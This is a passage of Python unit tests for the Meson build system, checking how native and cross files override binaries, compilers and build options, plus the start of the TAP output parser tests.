        self.current_wrapper = 0

    def helper_create_native_file(self, values):
        """Create a config file as a temporary file.

        values should be a nested dictionary structure of {section: {key: value}}
        """
        filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
        self.current_config += 1
        with open(filename, 'wt') as f:
            for section, entries in values.items():
                f.write('[{}]\n'.format(section))
                for k, v in entries.items():
                    # bools/ints/floats are written bare, lists as quoted
                    # arrays, everything else as a quoted string.
                    if isinstance(v, (bool, int, float)):
                        f.write("{}={}\n".format(k, v))
                    elif isinstance(v, list):
                        f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
                    else:
                        f.write("{}='{}'\n".format(k, v))
        return filename

    def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
        """Creates a wrapper around a binary that overrides specific values."""
        filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
        extra_args = extra_args or {}
        self.current_wrapper += 1
        if is_haiku():
            chbang = '#!/bin/env python3'
        else:
            chbang = '#!/usr/bin/env python3'

        with open(filename, 'wt') as f:
            f.write(textwrap.dedent('''\
                {}
                import argparse
                import subprocess
                import sys

                def main():
                    parser = argparse.ArgumentParser()
                '''.format(chbang)))
            for name in chain(extra_args, kwargs):
                f.write('    parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
            f.write('    args, extra_args = parser.parse_known_args()\n')
            for name, value in chain(extra_args.items(), kwargs.items()):
                f.write('    if args.{}:\n'.format(name))
                f.write('        print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
                f.write('        sys.exit(0)\n')
            f.write(textwrap.dedent('''
                    ret = subprocess.run(
                        ["{}"] + extra_args,
                        stdout=subprocess.PIPE,
                        stderr=subprocess.PIPE)
                    print(ret.stdout.decode('utf-8'))
                    print(ret.stderr.decode('utf-8'), file=sys.stderr)
                    sys.exit(ret.returncode)

                if __name__ == '__main__':
                    main()
                '''.format(binary)))
        if not is_windows():
            os.chmod(filename, 0o755)
            return filename

        # On windows we need yet another level of indirection, as cmd cannot
        # invoke python files itself, so instead we generate a .bat file, which
        # invokes our python wrapper
        batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
        with open(batfile, 'wt') as f:
            f.write(r'@{} {} %*'.format(sys.executable, filename))
        return batfile

    def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
        """Helper for generating tests for overriding compilers for languages
        with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
        """
        env = get_fake_env()
        getter = getattr(env, 'detect_{}_compiler'.format(lang))
        getter = functools.partial(getter, for_machine)
        cc = getter()
        # cb inspects the detected compiler and returns the binary to
        # override with plus the compiler id expected after the override.
        binary, newid = cb(cc)
        env.binaries[for_machine].binaries[lang] = binary
        compiler = getter()
        self.assertEqual(compiler.id, newid)

    def test_multiple_native_files_override(self):
        # When the same binary is set in two native files, the later file
        # must win (the '12345' wrapper, checked by the test project).
        wrapper = self.helper_create_binary_wrapper('bash', version='foo')
        config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
        wrapper = self.helper_create_binary_wrapper('bash', version='12345')
        config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
        self.init(self.testcase, extra_args=[
            '--native-file', config, '--native-file', config2,
            '-Dcase=find_program'])

    # This test hangs on cygwin.
    @unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
    def test_native_file_is_pipe(self):
        # A native file may be a fifo; a writer thread feeds the config while
        # meson reads it.
        fifo = os.path.join(self.builddir, 'native.file')
        os.mkfifo(fifo)
        with tempfile.TemporaryDirectory() as d:
            wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')

            def filler():
                with open(fifo, 'w') as f:
                    f.write('[binaries]\n')
                    f.write("bash = '{}'\n".format(wrapper))

            thread = threading.Thread(target=filler)
            thread.start()

            self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])

            thread.join()
            os.unlink(fifo)

            # Wipe to make sure reconfiguring does not try to re-read the
            # (now deleted) fifo.
            self.init(self.testcase, extra_args=['--wipe'])

    def test_multiple_native_files(self):
        # Distinct entries from multiple native files are merged.
        wrapper = self.helper_create_binary_wrapper('bash', version='12345')
        config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
        wrapper = self.helper_create_binary_wrapper('python')
        config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
        self.init(self.testcase, extra_args=[
            '--native-file', config, '--native-file', config2,
            '-Dcase=find_program'])

    def _simple_test(self, case, binary, entry=None):
        # Wrap ``binary`` with a fake version, point a native file at it, and
        # run the named sub-case of the test project.
        wrapper = self.helper_create_binary_wrapper(binary, version='12345')
        config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
        self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])

    def test_find_program(self):
        self._simple_test('find_program', 'bash')

    def test_config_tool_dep(self):
        # Do the skip at this level to avoid screwing up the cache
        if mesonbuild.environment.detect_msys2_arch():
            raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
        if not shutil.which('llvm-config'):
            raise unittest.SkipTest('No llvm-installed, cannot test')
        self._simple_test('config_dep', 'llvm-config')

    def test_python3_module(self):
        self._simple_test('python3', 'python3')

    def test_python_module(self):
        if is_windows():
            # Bat adds extra crap to stdout, so the version check logic in the
            # python module breaks. This is fine on other OSes because they
            # don't need the extra indirection.
            raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
        elif is_osx():
            binary = 'python'
        else:
            binary = 'python2'

            # We may not have python2, check for it
            for v in ['2', '2.7', '-2.7']:
                rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
                                     stdout=subprocess.DEVNULL,
                                     stderr=subprocess.DEVNULL)
                if rc == 0:
                    break
            else:
                raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
        self._simple_test('python', binary, entry='python')

    @unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
    @skip_if_env_set('CC')
    def test_c_compiler(self):
        # cb maps the detected compiler to the "other" implementation so the
        # override is observable; skips when only one implementation exists.
        def cb(comp):
            if comp.id == 'gcc':
                if not shutil.which('clang'):
                    raise unittest.SkipTest('Only one compiler found, cannot test.')
                return 'clang', 'clang'
            if not is_real_gnu_compiler(shutil.which('gcc')):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'gcc', 'gcc'
        self.helper_for_compiler('c', cb)

    @unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
    @skip_if_env_set('CXX')
    def test_cpp_compiler(self):
        def cb(comp):
            if comp.id == 'gcc':
                if not shutil.which('clang++'):
                    raise unittest.SkipTest('Only one compiler found, cannot test.')
                return 'clang++', 'clang'
            if not is_real_gnu_compiler(shutil.which('g++')):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'g++', 'gcc'
        self.helper_for_compiler('cpp', cb)

    @skip_if_not_language('objc')
    @skip_if_env_set('OBJC')
    def test_objc_compiler(self):
        def cb(comp):
            if comp.id == 'gcc':
                if not shutil.which('clang'):
                    raise unittest.SkipTest('Only one compiler found, cannot test.')
                return 'clang', 'clang'
            if not is_real_gnu_compiler(shutil.which('gcc')):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'gcc', 'gcc'
        self.helper_for_compiler('objc', cb)

    @skip_if_not_language('objcpp')
    @skip_if_env_set('OBJCXX')
    def test_objcpp_compiler(self):
        def cb(comp):
            if comp.id == 'gcc':
                if not shutil.which('clang++'):
                    raise unittest.SkipTest('Only one compiler found, cannot test.')
                return 'clang++', 'clang'
            if not is_real_gnu_compiler(shutil.which('g++')):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'g++', 'gcc'
        self.helper_for_compiler('objcpp', cb)

    @skip_if_not_language('d')
    @skip_if_env_set('DC')
    def test_d_compiler(self):
        def cb(comp):
            if comp.id == 'dmd':
                if shutil.which('ldc'):
                    return 'ldc', 'ldc'
                elif shutil.which('gdc'):
                    return 'gdc', 'gdc'
                else:
                    raise unittest.SkipTest('No alternative dlang compiler found.')
            if shutil.which('dmd'):
                return 'dmd', 'dmd'
            raise unittest.SkipTest('No alternative dlang compiler found.')
        self.helper_for_compiler('d', cb)

    @skip_if_not_language('cs')
    @skip_if_env_set('CSC')
    def test_cs_compiler(self):
        def cb(comp):
            if comp.id == 'csc':
                if not shutil.which('mcs'):
                    raise unittest.SkipTest('No alternate C# implementation.')
                return 'mcs', 'mcs'
            if not shutil.which('csc'):
                raise unittest.SkipTest('No alternate C# implementation.')
            return 'csc', 'csc'
        self.helper_for_compiler('cs', cb)

    @skip_if_not_language('fortran')
    @skip_if_env_set('FC')
    def test_fortran_compiler(self):
        def cb(comp):
            if comp.id == 'lcc':
                if shutil.which('lfortran'):
                    return 'lfortran', 'lcc'
                raise unittest.SkipTest('No alternate Fortran implementation.')
            elif comp.id == 'gcc':
                if shutil.which('ifort'):
                    # There is an ICC for windows (windows build, linux host),
                    # but we don't support that ATM so lets not worry about it.
                    if is_windows():
                        return 'ifort', 'intel-cl'
                    return 'ifort', 'intel'
                elif shutil.which('flang'):
                    return 'flang', 'flang'
                elif shutil.which('pgfortran'):
                    return 'pgfortran', 'pgi'
                # XXX: there are several other fortran compilers meson
                # supports, but I don't have any of them to test with
                raise unittest.SkipTest('No alternate Fortran implementation.')
            if not shutil.which('gfortran'):
                raise unittest.SkipTest('No alternate Fortran implementation.')
            return 'gfortran', 'gcc'
        self.helper_for_compiler('fortran', cb)

    def _single_implementation_compiler(self, lang: str, binary: str, version_str: str, version: str) -> None:
        """Helper for languages with a single (supported) implementation.

        Builds a wrapper around the compiler to override the version.
        """
        wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
        env = get_fake_env()
        getter = getattr(env, 'detect_{}_compiler'.format(lang))
        getter = functools.partial(getter, MachineChoice.HOST)
        env.binaries.host.binaries[lang] = [wrapper]
        compiler = getter()
        self.assertEqual(compiler.version, version)

    @skip_if_not_language('vala')
    @skip_if_env_set('VALAC')
    def test_vala_compiler(self):
        self._single_implementation_compiler(
            'vala', 'valac', 'Vala 1.2345', '1.2345')

    @skip_if_not_language('rust')
    @skip_if_env_set('RUSTC')
    def test_rust_compiler(self):
        self._single_implementation_compiler(
            'rust', 'rustc', 'rustc 1.2345', '1.2345')

    @skip_if_not_language('java')
    def test_java_compiler(self):
        self._single_implementation_compiler(
            'java', 'javac', 'javac 9.99.77', '9.99.77')

    @skip_if_not_language('swift')
    def test_swift_compiler(self):
        # swiftc reports its version on stderr and needs the -Xlinker probe
        # answered for detection to succeed.
        wrapper = self.helper_create_binary_wrapper(
            'swiftc', version='Swift 1.2345', outfile='stderr',
            extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
        env = get_fake_env()
        env.binaries.host.binaries['swift'] = [wrapper]
        compiler = env.detect_swift_compiler(MachineChoice.HOST)
        self.assertEqual(compiler.version, '1.2345')

    def test_native_file_dirs(self):
        testcase = os.path.join(self.unit_test_dir, '60 native file override')
        self.init(testcase, default_args=False,
                  extra_args=['--native-file', os.path.join(testcase, 'nativefile')])

    def test_native_file_dirs_overriden(self):
        testcase = os.path.join(self.unit_test_dir, '60 native file override')
        self.init(testcase, default_args=False,
                  extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
                              '-Ddef_libdir=liblib', '-Dlibdir=liblib'])

    def test_compile_sys_path(self):
        """Compiling with a native file stored in a system path works.

        There was a bug which caused the paths to be stored incorrectly and
        would result in ninja invoking meson in an infinite loop. This tests
        for that by actually invoking ninja.
        """
        testcase = os.path.join(self.common_test_dir, '1 trivial')

        # It really doesn't matter what's in the native file, just that it exists
        config = self.helper_create_native_file({'binaries': {'bash': 'false'}})

        self.init(testcase, extra_args=['--native-file', config])
        self.build()

    def test_user_options(self):
        # Invalid values for project options from a native file must be
        # rejected at configure time.
        testcase = os.path.join(self.common_test_dir, '41 options')
        for opt, value in [('testoption', 'some other val'), ('other_one', True),
                           ('combo_opt', 'one'), ('array_opt', ['two']),
                           ('integer_opt', 0),
                           ('CaseSenSiTivE', 'SOME other Value'),
                           ('CASESENSITIVE', 'some other Value')]:
            config = self.helper_create_native_file({'project options': {opt: value}})
            with self.assertRaises(subprocess.CalledProcessError) as cm:
                self.init(testcase, extra_args=['--native-file', config])
                # NOTE(review): this assertion sits inside the assertRaises
                # block, so it is skipped once init() raises — confirm intent.
                self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')

    def test_user_options_command_line_overrides(self):
        testcase = os.path.join(self.common_test_dir, '41 options')
        config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false']) def test_user_options_subproject(self): testcase = os.path.join(self.unit_test_dir, '80 user options for subproject') s = os.path.join(testcase, 'subprojects') if not os.path.exists(s): os.mkdir(s) s = os.path.join(s, 'sub') if not os.path.exists(s): sub = os.path.join(self.common_test_dir, '41 options') shutil.copytree(sub, s) for opt, value in [('testoption', 'some other val'), ('other_one', True), ('combo_opt', 'one'), ('array_opt', ['two']), ('integer_opt', 0)]: config = self.helper_create_native_file({'sub:project options': {opt: value}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_option_bool(self): # Bools are allowed to be unquoted testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({'built-in options': {'werror': True}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: # Test that no-per subproject options are inherited from the parent if 'werror' in each['name']: self.assertEqual(each['value'], True) break else: self.fail('Did not find werror in build options?') def test_option_integer(self): # Bools are allowed to be unquoted testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({'built-in options': {'unity_size': 100}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: # Test that no-per subproject options are inherited from the parent if 'unity_size' in each['name']: self.assertEqual(each['value'], 100) break else: self.fail('Did not find unity_size in build options?') def test_builtin_options(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config 
= self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++14') break else: self.fail('Did not find werror in build options?') def test_builtin_options_conf_overrides_env(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}}) self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'}) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/foo']) break else: self.fail('Did not find pkg_config_path in build options?') def test_builtin_options_subprojects(self): testcase = os.path.join(self.common_test_dir, '99 subproject subdir') config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: # Test that no-per subproject options are inherited from the parent if 'c_args' in each['name']: # This path will be hit twice, once for build and once for host, self.assertEqual(each['value'], ['-Dfoo']) found += 1 elif each['name'] == 'default_library': self.assertEqual(each['value'], 'both') found += 1 elif each['name'] == 'sub:default_library': self.assertEqual(each['value'], 'static') found += 1 self.assertEqual(found, 4, 'Did not find all three sections') def test_builtin_options_subprojects_overrides_buildfiles(self): # If the buildfile says subproject(... 
default_library: shared), ensure that's overwritten testcase = os.path.join(self.common_test_dir, '224 persubproject options') config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}}) with self.assertRaises((RuntimeError, subprocess.CalledProcessError)) as cm: self.init(testcase, extra_args=['--native-file', config]) if isinstance(cm, RuntimeError): check = str(cm.exception) else: check = cm.exception.stdout self.assertIn(check, 'Parent should override default_library') def test_builtin_options_subprojects_dont_inherits_parent_override(self): # If the buildfile says subproject(... default_library: shared), ensure that's overwritten testcase = os.path.join(self.common_test_dir, '224 persubproject options') config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}}) self.init(testcase, extra_args=['--native-file', config]) def test_builtin_options_compiler_properties(self): # the properties section can have lang_args, and those need to be # overwritten by the built-in options testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'c_args': ['-DFOO']}, 'properties': {'c_args': ['-DBAR']}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'c_args': self.assertEqual(each['value'], ['-DFOO']) break else: self.fail('Did not find c_args in build options?') def test_builtin_options_compiler_properties_legacy(self): # The legacy placement in properties is still valid if a 'built-in # options' setting is present, but doesn't have the lang_args testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'properties': {'c_args': ['-DBAR']}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = 
self.introspect('--buildoptions') for each in configuration: if each['name'] == 'c_args': self.assertEqual(each['value'], ['-DBAR']) break else: self.fail('Did not find c_args in build options?') def test_builtin_options_paths(self): # the properties section can have lang_args, and those need to be # overwritten by the built-in options testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'bindir': 'foo'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'foo') break else: self.fail('Did not find bindir in build options?') def test_builtin_options_paths_legacy(self): testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'bar') break else: self.fail('Did not find bindir in build options?') def test_builtin_options_paths_legacy(self): testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'bar') break else: self.fail('Did not find bindir in build options?') class CrossFileTests(BasePlatformTests): """Tests for cross file functionality not directly related to cross compiling. This is mainly aimed to testing overrides from cross files. 
""" def setUp(self): super().setUp() self.current_config = 0 self.current_wrapper = 0 def _cross_file_generator(self, *, needs_exe_wrapper: bool = False, exe_wrapper: T.Optional[T.List[str]] = None) -> str: if is_windows(): raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows') return textwrap.dedent(f"""\ [binaries] c = '{shutil.which('gcc' if is_sunos() else 'cc')}' ar = '{shutil.which('ar')}' strip = '{shutil.which('strip')}' exe_wrapper = {str(exe_wrapper) if exe_wrapper is not None else '[]'} [properties] needs_exe_wrapper = {needs_exe_wrapper} [host_machine] system = 'linux' cpu_family = 'x86' cpu = 'i686' endian = 'little' """) def _stub_exe_wrapper(self) -> str: return textwrap.dedent('''\ #!/usr/bin/env python3 import subprocess import sys sys.exit(subprocess.run(sys.argv[1:]).returncode) ''') def test_needs_exe_wrapper_true(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=True)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) out = self.run_target('test') self.assertRegex(out, r'Skipped:\s*1\s*\n') def test_needs_exe_wrapper_false(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=False)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) out = self.run_target('test') self.assertNotRegex(out, r'Skipped:\s*1\n') def test_needs_exe_wrapper_true_wrapper(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: s = Path(d) / 'wrapper.py' with s.open('wt') as f: f.write(self._stub_exe_wrapper()) s.chmod(0o774) p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator( needs_exe_wrapper=True, 
exe_wrapper=[str(s)])) self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true']) out = self.run_target('test') self.assertRegex(out, r'Ok:\s*3\s*\n') def test_cross_exe_passed_no_wrapper(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=True)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) self.build() out = self.run_target('test') self.assertRegex(out, r'Skipped:\s*1\s*\n') # The test uses mocking and thus requires that the current process is the # one to run the Meson steps. If we are using an external test executable # (most commonly in Debian autopkgtests) then the mocking won't work. @unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.') def test_cross_file_system_paths(self): if is_windows(): raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)') testdir = os.path.join(self.common_test_dir, '1 trivial') cross_content = self._cross_file_generator() with tempfile.TemporaryDirectory() as d: dir_ = os.path.join(d, 'meson', 'cross') os.makedirs(dir_) with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f: f.write(cross_content) name = os.path.basename(f.name) with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}): self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}): os.environ.pop('XDG_DATA_HOME', None) self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() with tempfile.TemporaryDirectory() as d: dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross') os.makedirs(dir_) with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f: f.write(cross_content) name = os.path.basename(f.name) # If XDG_DATA_HOME is set in the environment running the # tests this test will fail, os mock 
the environment, pop # it, then test with mock.patch.dict(os.environ): os.environ.pop('XDG_DATA_HOME', None) with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)): self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() def helper_create_cross_file(self, values): """Create a config file as a temporary file. values should be a nested dictionary structure of {section: {key: value}} """ filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config)) self.current_config += 1 with open(filename, 'wt') as f: for section, entries in values.items(): f.write('[{}]\n'.format(section)) for k, v in entries.items(): f.write("{}='{}'\n".format(k, v)) return filename def test_cross_file_dirs(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '-Ddef_bindir=binbar', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libdir=libbar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_cross_file_dirs_overriden(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '-Ddef_libdir=liblib', '-Dlibdir=liblib', '-Ddef_bindir=binbar', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def 
test_cross_file_dirs_chain(self): # crossfile2 overrides crossfile overrides nativefile testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '--cross-file', os.path.join(testcase, 'crossfile2'), '-Ddef_bindir=binbar2', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libdir=libbar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_user_options(self): # This is just a touch test for cross file, since the implementation # shares code after loading from the files testcase = os.path.join(self.common_test_dir, '41 options') config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--cross-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_builtin_options(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}}) self.init(testcase, extra_args=['--cross-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++14') break else: self.fail('No c++ standard set?') def test_builtin_options_per_machine(self): """Test options that are allowed to be set on a per-machine basis. Such options could be passed twice, once for the build machine, and once for the host machine. I've picked pkg-config path, but any would do that can be set for both. 
""" testcase = os.path.join(self.common_test_dir, '2 cpp') cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}}) native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}}) # Ensure that PKG_CONFIG_PATH is not set in the environment with mock.patch.dict('os.environ'): for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']: try: del os.environ[k] except KeyError: pass self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native]) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/cross/path']) found += 1 elif each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++17') found += 1 elif each['name'] == 'build.pkg_config_path': self.assertEqual(each['value'], ['/native/path']) found += 1 elif each['name'] == 'build.cpp_std': self.assertEqual(each['value'], 'c++14') found += 1 if found == 4: break self.assertEqual(found, 4, 'Did not find all sections.') def test_builtin_options_conf_overrides_env(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native'}}) cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross'}}) self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross], override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'}) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/cross']) found += 1 elif each['name'] == 'build.pkg_config_path': self.assertEqual(each['value'], ['/native']) found += 1 if found == 2: break self.assertEqual(found, 2, 'Did not find all sections.') class TAPParserTests(unittest.TestCase): def assert_test(self, 
events, **kwargs): if 'explanation' not in kwargs: kwargs['explanation'] = None self.assertEqual(next(events), TAPParser.Test(**kwargs)) def assert_plan(self, events, **kwargs): if 'skipped' not in kwargs: kwargs['skipped'] = False if 'explanation' not in kwargs: kwargs['explanation'] = None self.assertEqual(next(events), TAPParser.Plan(**kwargs)) def assert_version(self, events, **kwargs): self.assertEqual(next(events), TAPParser.Version(**kwargs)) def assert_error(self, events): self.assertEqual(type(next(events)), TAPParser.Error) def assert_bailout(self, events, **kwargs): self.assertEqual(next(events), TAPParser.Bailout(**kwargs)) def assert_last(self, events): with self.assertRaises(StopIteration): next(events) def parse_tap(self, s): parser = TAPParser() return iter(parser.parse(io.StringIO(s))) def parse_tap_v13(self, s): events = self.parse_tap('TAP version 13\n' + s) self.assert_version(events, version=13) return events def test_empty(self): events = self.parse_tap('') self.assert_last(events) def test_empty_plan(self): events = self.parse_tap('1..0') self.assert_plan(events, num_tests=0, late=False, skipped=True) self.assert_last(events) def test_plan_directive(self): events = self.parse_tap('1..0 # skipped for some reason') self.assert_plan(events, num_tests=0, late=False, skipped=True, explanation='for some reason') self.assert_last(events) events = self.parse_tap('1..1 # skipped for some reason\nok 1') self.assert_error(events) self.assert_plan(events, num_tests=1, late=False, skipped=True, explanation='for some reason') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('1..1 # todo not supported here\nok 1') self.assert_error(events) self.assert_plan(events, num_tests=1, late=False, skipped=False, explanation='not supported here') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_ok(self): events = self.parse_tap('ok') 
        # (Tail of the previous TAPParserTests method — its `def` line is
        # above this chunk.)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

    def test_one_test_with_number(self):
        events = self.parse_tap('ok 1')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

    def test_one_test_with_name(self):
        events = self.parse_tap('ok 1 abc')
        self.assert_test(events, number=1, name='abc', result=TestResult.OK)
        self.assert_last(events)

    def test_one_test_not_ok(self):
        events = self.parse_tap('not ok')
        self.assert_test(events, number=1, name='', result=TestResult.FAIL)
        self.assert_last(events)

